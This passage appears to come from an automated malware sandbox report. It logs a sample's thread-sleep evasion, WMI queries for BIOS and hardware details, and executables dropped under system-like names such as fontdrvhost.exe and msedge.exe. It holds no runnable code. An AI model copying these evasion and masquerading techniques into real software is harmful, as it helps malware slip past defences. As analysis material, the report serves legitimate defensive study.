                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 922337203685477
                                Source: C:\ProgramData\fontdrvhost.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 922337203685477
                                Source: C:\ProgramData\fontdrvhost.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeWindow / User API: threadDelayed 3799Jump to behavior
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeWindow / User API: threadDelayed 5726Jump to behavior
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWindow / User API: threadDelayed 4241
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWindow / User API: threadDelayed 5456
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5095
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5004
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5798
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5635
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5740
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exe TID: 7648Thread sleep time: -26747778906878833s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe TID: 7880Thread sleep time: -30000s >= -30000sJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe TID: 7788Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -37815825351104557s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -600000s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -599889s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -599780s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -599671s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -599562s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -599453s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -599341s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -599232s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -598884s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -598769s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -598640s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 3568Thread sleep time: -30000s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -598505s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -598312s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -597218s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 7120Thread sleep time: -3600000s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -596343s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -594093s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -593484s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -593093s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -592859s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -590812s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -590562s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 7120Thread sleep time: -300000s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -590343s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -590130s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -588968s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -588363s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -588156s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -587937s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -587609s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -587452s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -587183s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -585670s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -585560s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -585405s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -585276s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -585130s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -584937s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -584828s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -584715s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -584593s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -584484s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -584310s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -583603s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -583462s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -583352s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -583234s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -583124s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -583015s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -582903s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -582767s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -582640s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -582530s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -582421s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -582312s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -582202s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -582093s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -581984s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -581874s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -581750s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -581634s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -580867s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -580750s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -580640s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -580531s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 8128Thread sleep time: -580421s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7088Thread sleep count: 5095 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4536Thread sleep time: -8301034833169293s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3832Thread sleep time: -1844674407370954s >= -30000s
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 7812Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1012Thread sleep count: 5004 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4788Thread sleep time: -9223372036854770s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7508Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4128Thread sleep count: 5798 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4280Thread sleep time: -10145709240540247s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3648Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3776Thread sleep count: 5635 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4268Thread sleep time: -7378697629483816s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2100Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\ProgramData\fontdrvhost.exe TID: 3904Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4628Thread sleep count: 5740 > 30
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4676Thread sleep time: -9223372036854770s >= -30000s
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4452Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\ProgramData\fontdrvhost.exe TID: 7808Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\ProgramData\fontdrvhost.exe TID: 8112Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 6836Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\svchost.exe TID: 608Thread sleep time: -30000s >= -30000s
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 3828Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\ProgramData\fontdrvhost.exe TID: 6392Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 5540Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\ProgramData\fontdrvhost.exe TID: 4668Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe TID: 5292Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\ProgramData\fontdrvhost.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\ProgramData\fontdrvhost.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\ProgramData\fontdrvhost.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\ProgramData\fontdrvhost.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\ProgramData\fontdrvhost.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Users\user\Desktop\Wh2c6sgwRo.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 922337203685477
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 600000
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 599889
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 599780
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 599671
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 599562
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 599453
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 599341
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 599232
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 598884
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 598769
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 598640
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 30000
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 598505
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 598312
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 597218
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 3600000
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 596343
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 594093
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 593484
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 593093
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 592859
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 590812
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 590562
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 300000
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 590343
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 590130
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 588968
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 588363
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 588156
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 587937
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 587609
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 587452
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 587183
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 585670
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 585560
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 585405
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 585276
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 585130
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 584937
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 584828
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 584715
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 584593
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 584484
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 584310
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 583603
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 583462
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 583352
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 583234
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 583124
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 583015
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 582903
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 582767
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 582640
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 582530
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 582421
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 582312
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 582202
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 582093
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 581984
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 581874
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 581750
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 581634
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 580867
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 580750
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 580640
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 580531
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 580421
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\ProgramData\fontdrvhost.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\ProgramData\fontdrvhost.exeThread delayed: delay time: 922337203685477
                                Source: C:\ProgramData\fontdrvhost.exeThread delayed: delay time: 922337203685477
                                Source: C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 922337203685477
                                Source: C:\ProgramData\fontdrvhost.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 922337203685477
                                Source: C:\ProgramData\fontdrvhost.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeFile opened: C:\Users\userJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeFile opened: C:\Users\user\AppDataJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                Source: dD82yUOZl5.27.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
